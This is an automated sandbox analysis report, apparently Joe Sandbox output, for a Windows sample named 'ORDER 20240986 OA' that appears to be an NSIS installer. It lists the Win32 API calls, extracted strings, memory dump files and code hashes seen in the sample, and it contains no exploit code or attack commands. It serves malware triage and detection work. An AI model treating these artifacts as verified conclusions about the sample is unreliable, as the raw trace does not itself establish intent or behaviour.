                                                                                                                                                  • GlobalLock.KERNEL32(00000000), ref: 0040577C
                                                                                                                                                  • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405790
                                                                                                                                                  • GlobalUnlock.KERNEL32(00000000), ref: 004057B0
                                                                                                                                                  • SetClipboardData.USER32(0000000D,00000000), ref: 004057BB
                                                                                                                                                  • CloseClipboard.USER32 ref: 004057C1
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000004.00000002.2945221064.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000004.00000002.2945200507.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000004.00000002.2945241945.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000004.00000002.2945259440.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000004.00000002.2945380974.00000000007C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_4_2_400000_ORDER 20240986 OA.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
                                                                                                                                                  • String ID: {
                                                                                                                                                  • API String ID: 590372296-366298937
                                                                                                                                                  • Opcode ID: 17a21c63557b4cf9ffe78a5fd5086114b1c8428fb936cdfcd18ae7c9549b7d0c
                                                                                                                                                  • Instruction ID: e2c232b37aba284685acfefcf9c5e68312cc9a4ea8bcb72f9f75ba3fcde89da4
                                                                                                                                                  • Opcode Fuzzy Hash: 17a21c63557b4cf9ffe78a5fd5086114b1c8428fb936cdfcd18ae7c9549b7d0c
                                                                                                                                                  • Instruction Fuzzy Hash: 0EB15871900608FFDB119FA0DD89EAE7B79FB48354F00812AFA44BA1A0CB795E51DF58
                                                                                                                                                  APIs
                                                                                                                                                  • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403D71
                                                                                                                                                  • ShowWindow.USER32(?), ref: 00403D8E
                                                                                                                                                  • DestroyWindow.USER32 ref: 00403DA2
                                                                                                                                                  • SetWindowLongW.USER32(?,00000000,00000000), ref: 00403DBE
                                                                                                                                                  • GetDlgItem.USER32(?,?), ref: 00403DDF
                                                                                                                                                  • SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 00403DF3
                                                                                                                                                  • IsWindowEnabled.USER32(00000000), ref: 00403DFA
                                                                                                                                                  • GetDlgItem.USER32(?,?), ref: 00403EA8
                                                                                                                                                  • GetDlgItem.USER32(?,00000002), ref: 00403EB2
                                                                                                                                                  • SetClassLongW.USER32(?,000000F2,?), ref: 00403ECC
                                                                                                                                                  • SendMessageW.USER32(0000040F,00000000,?), ref: 00403F1D
                                                                                                                                                  • GetDlgItem.USER32(?,00000003), ref: 00403FC3
                                                                                                                                                  • ShowWindow.USER32(00000000,?), ref: 00403FE4
                                                                                                                                                  • EnableWindow.USER32(?,?), ref: 00403FF6
                                                                                                                                                  • EnableWindow.USER32(?,?), ref: 00404011
                                                                                                                                                  • GetSystemMenu.USER32(?,00000000,0000F060,?), ref: 00404027
                                                                                                                                                  • EnableMenuItem.USER32(00000000), ref: 0040402E
                                                                                                                                                  • SendMessageW.USER32(?,000000F4,00000000,?), ref: 00404046
                                                                                                                                                  • SendMessageW.USER32(?,00000401,00000002,00000000), ref: 00404059
                                                                                                                                                  • lstrlenW.KERNEL32(007A1F20,?,007A1F20,00000000), ref: 00404083
                                                                                                                                                  • SetWindowTextW.USER32(?,007A1F20), ref: 00404097
                                                                                                                                                  • ShowWindow.USER32(?,0000000A), ref: 004041CB
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000004.00000002.2945221064.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000004.00000002.2945200507.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000004.00000002.2945241945.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000004.00000002.2945259440.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000004.00000002.2945380974.00000000007C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_4_2_400000_ORDER 20240986 OA.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Window$Item$MessageSend$EnableShow$LongMenu$ClassDestroyEnabledSystemTextlstrlen
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 184305955-0
                                                                                                                                                  • Opcode ID: ee67474a1a288a69095d81a28a6b41206e342fd1b930cad1f65484e832d6543b
                                                                                                                                                  • Instruction ID: db2580999c41c4fe450d1ee4fd1a55221d51bf0aef153e7307bc2b2ec56299a6
                                                                                                                                                  • Opcode Fuzzy Hash: ee67474a1a288a69095d81a28a6b41206e342fd1b930cad1f65484e832d6543b
                                                                                                                                                  • Instruction Fuzzy Hash: 3FC1DEB2504200AFDB206F61ED48E2B3AA8EB9A745F01453FF651B11F0CB399991DB5E
                                                                                                                                                  APIs
                                                                                                                                                    • Part of subcall function 00406671: GetModuleHandleA.KERNEL32(?,00000020,?,004033DE,0000000A), ref: 00406683
                                                                                                                                                    • Part of subcall function 00406671: GetProcAddress.KERNEL32(00000000,?), ref: 0040669E
                                                                                                                                                  • lstrcatW.KERNEL32(007B5000,007A1F20,80000001,Control Panel\Desktop\ResourceLocale,00000000,007A1F20,00000000,00000002,007B5800,74DF3420,007B3000,00000000), ref: 00403A08
                                                                                                                                                  • lstrlenW.KERNEL32(007A69C0,007B3800,?,?,007A69C0,00000000,007B3800,007B5000,007A1F20,80000001,Control Panel\Desktop\ResourceLocale,00000000,007A1F20,00000000,00000002,007B5800), ref: 00403A88
                                                                                                                                                  • lstrcmpiW.KERNEL32(007A69B8,.exe,007A69C0,007B3800,?,?,007A69C0,00000000,007B3800,007B5000,007A1F20,80000001,Control Panel\Desktop\ResourceLocale,00000000,007A1F20,00000000), ref: 00403A9B
                                                                                                                                                  • GetFileAttributesW.KERNEL32(007A69C0), ref: 00403AA6
                                                                                                                                                  • LoadImageW.USER32(00000067,?,00000000,00000000,00008040,007B3800), ref: 00403AEF
                                                                                                                                                    • Part of subcall function 004061DE: wsprintfW.USER32 ref: 004061EB
                                                                                                                                                  • RegisterClassW.USER32(007A79C0), ref: 00403B2C
                                                                                                                                                  • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00403B44
                                                                                                                                                  • CreateWindowExW.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00403B79
                                                                                                                                                  • ShowWindow.USER32(00000005), ref: 00403BAF
                                                                                                                                                  • GetClassInfoW.USER32(00000000,RichEdit20W,007A79C0), ref: 00403BDB
                                                                                                                                                  • GetClassInfoW.USER32(00000000,RichEdit,007A79C0), ref: 00403BE8
                                                                                                                                                  • RegisterClassW.USER32(007A79C0), ref: 00403BF1
                                                                                                                                                  • DialogBoxParamW.USER32(?,00000000,00403D35,00000000), ref: 00403C10
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000004.00000002.2945221064.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000004.00000002.2945200507.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000004.00000002.2945241945.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000004.00000002.2945259440.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000004.00000002.2945380974.00000000007C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_4_2_400000_ORDER 20240986 OA.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Class$Info$RegisterWindow$AddressAttributesCreateDialogFileHandleImageLoadModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
                                                                                                                                                  • String ID: .DEFAULT\Control Panel\International$.exe$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20W$_Nb
                                                                                                                                                  • API String ID: 1975747703-1115850852
                                                                                                                                                  • Opcode ID: 123c00e8e8eae349a6b6ffc178d207f9f8b23400aead47fb4df4bed5afc77f76
                                                                                                                                                  • Instruction ID: fbef4646fbcf09e2f3785bbd11e1a9055ea34cd93d2d0ed92f9d0f486109358d
                                                                                                                                                  • Opcode Fuzzy Hash: 123c00e8e8eae349a6b6ffc178d207f9f8b23400aead47fb4df4bed5afc77f76
                                                                                                                                                  • Instruction Fuzzy Hash: 4D61B434200700AED320AF669D45F2B3A6CEB86745F40857FF941B51E2DB7D6901CB2D
                                                                                                                                                  APIs
                                                                                                                                                  • CheckDlgButton.USER32(?,-0000040A,?), ref: 0040446B
                                                                                                                                                  • GetDlgItem.USER32(?,000003E8), ref: 0040447F
                                                                                                                                                  • SendMessageW.USER32(00000000,0000045B,?,00000000), ref: 0040449C
                                                                                                                                                  • GetSysColor.USER32(?), ref: 004044AD
                                                                                                                                                  • SendMessageW.USER32(00000000,00000443,00000000,?), ref: 004044BB
                                                                                                                                                  • SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 004044C9
                                                                                                                                                  • lstrlenW.KERNEL32(?), ref: 004044CE
                                                                                                                                                  • SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 004044DB
                                                                                                                                                  • SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 004044F0
                                                                                                                                                  • GetDlgItem.USER32(?,0000040A), ref: 00404549
                                                                                                                                                  • SendMessageW.USER32(00000000), ref: 00404550
                                                                                                                                                  • GetDlgItem.USER32(?,000003E8), ref: 0040457B
                                                                                                                                                  • SendMessageW.USER32(00000000,0000044B,00000000,00000201), ref: 004045BE
                                                                                                                                                  • LoadCursorW.USER32(00000000,00007F02), ref: 004045CC
                                                                                                                                                  • SetCursor.USER32(00000000), ref: 004045CF
                                                                                                                                                  • LoadCursorW.USER32(00000000,00007F00), ref: 004045E8
                                                                                                                                                  • SetCursor.USER32(00000000), ref: 004045EB
                                                                                                                                                  • SendMessageW.USER32(00000111,?,00000000), ref: 0040461A
                                                                                                                                                  • SendMessageW.USER32(00000010,00000000,00000000), ref: 0040462C
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000004.00000002.2945221064.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000004.00000002.2945200507.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000004.00000002.2945241945.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000004.00000002.2945259440.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000004.00000002.2945380974.00000000007C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_4_2_400000_ORDER 20240986 OA.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorlstrlen
                                                                                                                                                  • String ID: DC@$N
                                                                                                                                                  • API String ID: 3103080414-4075224758
                                                                                                                                                  • Opcode ID: 2da216cdb10da56fdc38759a2ba284d26a9c8f7b49192765219d3b76b1da507d
                                                                                                                                                  • Instruction ID: 7c305bb631aa8564409a9791ba7e53f932479190766108f73685c8e55a50eb1d
                                                                                                                                                  • Opcode Fuzzy Hash: 2da216cdb10da56fdc38759a2ba284d26a9c8f7b49192765219d3b76b1da507d
                                                                                                                                                  • Instruction Fuzzy Hash: 3B61A0B1900209BFDF10AF60DD45AAA7B69FB85344F00843AF701B61E0D77DA951CF98
                                                                                                                                                  APIs
                                                                                                                                                  • DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
                                                                                                                                                  • BeginPaint.USER32(?,?), ref: 00401047
                                                                                                                                                  • GetClientRect.USER32(?,?), ref: 0040105B
                                                                                                                                                  • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                                                                                                                                                  • FillRect.USER32(00000000,?,00000000), ref: 004010E4
                                                                                                                                                  • DeleteObject.GDI32(?), ref: 004010ED
                                                                                                                                                  • CreateFontIndirectW.GDI32(?), ref: 00401105
                                                                                                                                                  • SetBkMode.GDI32(00000000,?), ref: 00401126
                                                                                                                                                  • SetTextColor.GDI32(00000000,000000FF), ref: 00401130
                                                                                                                                                  • SelectObject.GDI32(00000000,?), ref: 00401140
                                                                                                                                                  • DrawTextW.USER32(00000000,007A7A20,000000FF,00000010,00000820), ref: 00401156
                                                                                                                                                  • SelectObject.GDI32(00000000,00000000), ref: 00401160
                                                                                                                                                  • DeleteObject.GDI32(?), ref: 00401165
                                                                                                                                                  • EndPaint.USER32(?,?), ref: 0040116E
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000004.00000002.2945221064.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000004.00000002.2945200507.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000004.00000002.2945241945.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000004.00000002.2945259440.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000004.00000002.2945380974.00000000007C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_4_2_400000_ORDER 20240986 OA.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                                                                                                                                  • String ID: F
                                                                                                                                                  • API String ID: 941294808-1304234792
                                                                                                                                                  • Opcode ID: 218f2c87b148b58c94c6785b51cf5afc075c1faf60bc5df3e6f759b2377d660f
                                                                                                                                                  • Instruction ID: 0958fbfe94b1809001ec2c76305b3cf500f7264b01c73c256976ee1787a3906e
                                                                                                                                                  • Opcode Fuzzy Hash: 218f2c87b148b58c94c6785b51cf5afc075c1faf60bc5df3e6f759b2377d660f
                                                                                                                                                  • Instruction Fuzzy Hash: B1418C71800209AFCF058F95DE459AF7BB9FF45310F00842AF591AA1A0CB38D954DFA4
                                                                                                                                                  APIs
                                                                                                                                                  • CloseHandle.KERNEL32(00000000,?,00000000,?,00000000,00000000,?,?,0040607E,?,?), ref: 00405F1E
                                                                                                                                                  • GetShortPathNameW.KERNEL32(?,007A55C0,00000400), ref: 00405F27
                                                                                                                                                    • Part of subcall function 00405CF2: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405FD7,00000000,[Rename],00000000,00000000,00000000), ref: 00405D02
                                                                                                                                                    • Part of subcall function 00405CF2: lstrlenA.KERNEL32(00000000,?,00000000,00405FD7,00000000,[Rename],00000000,00000000,00000000), ref: 00405D34
                                                                                                                                                  • GetShortPathNameW.KERNEL32(?,007A5DC0,00000400), ref: 00405F44
                                                                                                                                                  • wsprintfA.USER32 ref: 00405F62
                                                                                                                                                  • GetFileSize.KERNEL32(00000000,00000000,007A5DC0,C0000000,00000004,007A5DC0,?), ref: 00405F9D
                                                                                                                                                  • GlobalAlloc.KERNEL32(00000040,0000000A), ref: 00405FAC
                                                                                                                                                  • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000), ref: 00405FE4
                                                                                                                                                  • SetFilePointer.KERNEL32(0040A560,00000000,00000000,00000000,00000000,007A51C0,00000000,-0000000A,0040A560,00000000,[Rename],00000000,00000000,00000000), ref: 0040603A
                                                                                                                                                  • GlobalFree.KERNEL32(00000000), ref: 0040604B
                                                                                                                                                  • CloseHandle.KERNEL32(00000000), ref: 00406052
                                                                                                                                                    • Part of subcall function 00405D8D: GetFileAttributesW.KERNEL32(007B6800,00402F1D,007B6800,80000000,00000003,?,00000006,00000008,0000000A), ref: 00405D91
                                                                                                                                                    • Part of subcall function 00405D8D: CreateFileW.KERNEL32(?,?,?,00000000,?,00000001,00000000,?,00000006,00000008,0000000A), ref: 00405DB3
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000004.00000002.2945221064.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000004.00000002.2945200507.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000004.00000002.2945241945.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000004.00000002.2945259440.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000004.00000002.2945380974.00000000007C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_4_2_400000_ORDER 20240986 OA.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: File$CloseGlobalHandleNamePathShortlstrlen$AllocAttributesCreateFreePointerSizelstrcpywsprintf
                                                                                                                                                  • String ID: %ls=%ls$[Rename]
                                                                                                                                                  • API String ID: 2171350718-461813615
                                                                                                                                                  • Opcode ID: 8e2ef562050374cbdee482ce01d0fc4b650d83fac470073e0dfd2f2c2df1a008
                                                                                                                                                  • Instruction ID: 42876e8bd8e74e9ce15c52ab3024c97c29192655820983ae090f8c600f4dcad6
                                                                                                                                                  • Opcode Fuzzy Hash: 8e2ef562050374cbdee482ce01d0fc4b650d83fac470073e0dfd2f2c2df1a008
                                                                                                                                                  • Instruction Fuzzy Hash: 25312530240B156BD220BB218D48F6B3A9DEF86744F15003AFA42F62D1EA7DD8148ABD
                                                                                                                                                  APIs
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000004.00000002.2945221064.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000004.00000002.2945200507.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000004.00000002.2945241945.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000004.00000002.2945259440.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000004.00000002.2945380974.00000000007C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_4_2_400000_ORDER 20240986 OA.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: ErrorModeVersionlstrlen
                                                                                                                                                  • String ID: NSIS Error$UXTHEME
                                                                                                                                                  • API String ID: 758611499-110662866
                                                                                                                                                  • Opcode ID: 216c36faef8c5c050b55b88396924ad1417f673f7408521f9ddb59849cb913ab
                                                                                                                                                  • Instruction ID: a84716d26b240927f2f501cde0935ca932456bd970f48cf256b7861c77eac06c
                                                                                                                                                  • Opcode Fuzzy Hash: 216c36faef8c5c050b55b88396924ad1417f673f7408521f9ddb59849cb913ab
                                                                                                                                                  • Instruction Fuzzy Hash: FF218071500700ABD7207F61AE49B1B3AA8AB81705F01843FF981B62E2DF7D49558B6E
                                                                                                                                                  APIs
                                                                                                                                                  • GetDlgItem.USER32(?,000003FB), ref: 0040474E
                                                                                                                                                  • SetWindowTextW.USER32(00000000,?), ref: 00404778
                                                                                                                                                  • SHBrowseForFolderW.SHELL32(?), ref: 00404829
                                                                                                                                                  • CoTaskMemFree.OLE32(00000000), ref: 00404834
                                                                                                                                                  • lstrcmpiW.KERNEL32(007A69C0,007A1F20,00000000,?,?), ref: 00404866
                                                                                                                                                  • lstrcatW.KERNEL32(?,007A69C0), ref: 00404872
                                                                                                                                                  • SetDlgItemTextW.USER32(?,000003FB,?), ref: 00404884
                                                                                                                                                    • Part of subcall function 004058E1: GetDlgItemTextW.USER32(?,?,00000400,004048BB), ref: 004058F4
                                                                                                                                                    • Part of subcall function 0040652B: CharNextW.USER32(?,*?|<>/":,00000000,00000000,007B5800,007B5800,007B3000,00403347,007B5800,74DF3420,004035B6,?,00000006,00000008,0000000A), ref: 0040658E
                                                                                                                                                    • Part of subcall function 0040652B: CharNextW.USER32(?,?,?,00000000,?,00000006,00000008,0000000A), ref: 0040659D
                                                                                                                                                    • Part of subcall function 0040652B: CharNextW.USER32(?,00000000,007B5800,007B5800,007B3000,00403347,007B5800,74DF3420,004035B6,?,00000006,00000008,0000000A), ref: 004065A2
                                                                                                                                                    • Part of subcall function 0040652B: CharPrevW.USER32(?,?,007B5800,007B5800,007B3000,00403347,007B5800,74DF3420,004035B6,?,00000006,00000008,0000000A), ref: 004065B5
                                                                                                                                                  • GetDiskFreeSpaceW.KERNEL32(0079FEF0,?,?,0000040F,?,0079FEF0,0079FEF0,?,?,0079FEF0,?,?,000003FB,?), ref: 00404947
                                                                                                                                                  • MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404962
                                                                                                                                                    • Part of subcall function 00404ABB: lstrlenW.KERNEL32(007A1F20,007A1F20,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404B5C
                                                                                                                                                    • Part of subcall function 00404ABB: wsprintfW.USER32 ref: 00404B65
                                                                                                                                                    • Part of subcall function 00404ABB: SetDlgItemTextW.USER32(?,007A1F20), ref: 00404B78
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000004.00000002.2945221064.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000004.00000002.2945200507.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000004.00000002.2945241945.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000004.00000002.2945259440.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000004.00000002.2945380974.00000000007C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_4_2_400000_ORDER 20240986 OA.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
                                                                                                                                                  • String ID: A
                                                                                                                                                  • API String ID: 2624150263-3554254475
                                                                                                                                                  • Opcode ID: f17bf99eb9744ef0591981256be4ea8978b4dd8b1bc8bb353c7e53d074d4b920
                                                                                                                                                  • Instruction ID: d6689dd06746f62e3dccefeeeb603cce7d7bc9c76077680089f181f5c68842d6
                                                                                                                                                  • Opcode Fuzzy Hash: f17bf99eb9744ef0591981256be4ea8978b4dd8b1bc8bb353c7e53d074d4b920
                                                                                                                                                  • Instruction Fuzzy Hash: DFA190F1900209ABDB11AFA5CD41AAFB7B8EF85304F10843BF611B62D1D77C99418B6D
                                                                                                                                                  APIs
                                                                                                                                                  • GetSystemDirectoryW.KERNEL32(007A69C0,00000400), ref: 004063FA
                                                                                                                                                  • GetWindowsDirectoryW.KERNEL32(007A69C0,00000400,00000000,007A0F00,?,00405336,007A0F00,?), ref: 0040640D
                                                                                                                                                  • SHGetSpecialFolderLocation.SHELL32(6S@,?,00000000,007A0F00,?,00405336,007A0F00,?), ref: 00406449
                                                                                                                                                  • SHGetPathFromIDListW.SHELL32(?,007A69C0), ref: 00406457
                                                                                                                                                  • CoTaskMemFree.OLE32(?), ref: 00406462
                                                                                                                                                  • lstrcatW.KERNEL32(007A69C0,\Microsoft\Internet Explorer\Quick Launch), ref: 00406488
                                                                                                                                                  • lstrlenW.KERNEL32(007A69C0,00000000,007A0F00,?,00405336,007A0F00,?), ref: 004064E0
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000004.00000002.2945221064.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000004.00000002.2945200507.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000004.00000002.2945241945.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000004.00000002.2945259440.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000004.00000002.2945380974.00000000007C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_4_2_400000_ORDER 20240986 OA.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskWindowslstrcatlstrlen
                                                                                                                                                  • String ID: 6S@$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                                                                                                                                                  • API String ID: 717251189-2551480263
                                                                                                                                                  • Opcode ID: 6ca7045f1a7671301313a85d8900d55d77a8c8edd744d26f36594b0d48a563bf
                                                                                                                                                  • Instruction ID: 404aa91c63c37ecb41bc9170075bd2a6d7acde9a16fb3e5716bfaea1f71b207e
                                                                                                                                                  • Opcode Fuzzy Hash: 6ca7045f1a7671301313a85d8900d55d77a8c8edd744d26f36594b0d48a563bf
                                                                                                                                                  • Instruction Fuzzy Hash: C0613671A00511ABDF209F24DD40ABE37A5AF45314F12813FE943BA2D0EB3C99A1CB5D
                                                                                                                                                  APIs
                                                                                                                                                  • GlobalAlloc.KERNEL32(00000040,0000000A,?,00000006,00000008,0000000A), ref: 0040308E
                                                                                                                                                  • SetFilePointer.KERNEL32(?,00000000,00000000,?,?,?,?,?,?,000000FF,00000000,00000000,?,?), ref: 004030F4
                                                                                                                                                    • Part of subcall function 00402E79: DestroyWindow.USER32(?,00000000,00403059,?,?,00000006,00000008,0000000A), ref: 00402E8C
                                                                                                                                                  Strings
                                                                                                                                                  • Inst, xrefs: 00402FC2
                                                                                                                                                  • Null, xrefs: 00402FD4
                                                                                                                                                  • Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author , xrefs: 004030B5
                                                                                                                                                  • vy, xrefs: 00402F6B
                                                                                                                                                  • soft, xrefs: 00402FCB
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000004.00000002.2945221064.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000004.00000002.2945200507.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000004.00000002.2945241945.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000004.00000002.2945259440.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000004.00000002.2945380974.00000000007C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_4_2_400000_ORDER 20240986 OA.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: AllocDestroyFileGlobalPointerWindow
                                                                                                                                                  • String ID: Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft$vy
                                                                                                                                                  • API String ID: 1580554587-3989296954
                                                                                                                                                  • Opcode ID: dd6470cab726a57cc84fa7a94d20a0cfb733827f7616c352e0bbc3f2355a85a1
                                                                                                                                                  • Instruction ID: 4f853fa222ecb05c404167484fdfded8992d3bc80b65af41a5722040fb63cb1a
                                                                                                                                                  • Opcode Fuzzy Hash: dd6470cab726a57cc84fa7a94d20a0cfb733827f7616c352e0bbc3f2355a85a1
                                                                                                                                                  • Instruction Fuzzy Hash: 9541B271A012059BDF20DF65DD85B9E7FA8EB0175AF14803BE900B62D5DB7C8E808B5D
                                                                                                                                                  APIs
                                                                                                                                                  • GetWindowLongW.USER32(?,000000EB), ref: 00404292
                                                                                                                                                  • GetSysColor.USER32(00000000), ref: 004042D0
                                                                                                                                                  • SetTextColor.GDI32(?,00000000), ref: 004042DC
                                                                                                                                                  • SetBkMode.GDI32(?,?), ref: 004042E8
                                                                                                                                                  • GetSysColor.USER32(?), ref: 004042FB
                                                                                                                                                  • SetBkColor.GDI32(?,?), ref: 0040430B
                                                                                                                                                  • DeleteObject.GDI32(?), ref: 00404325
                                                                                                                                                  • CreateBrushIndirect.GDI32(?), ref: 0040432F
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000004.00000002.2945221064.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
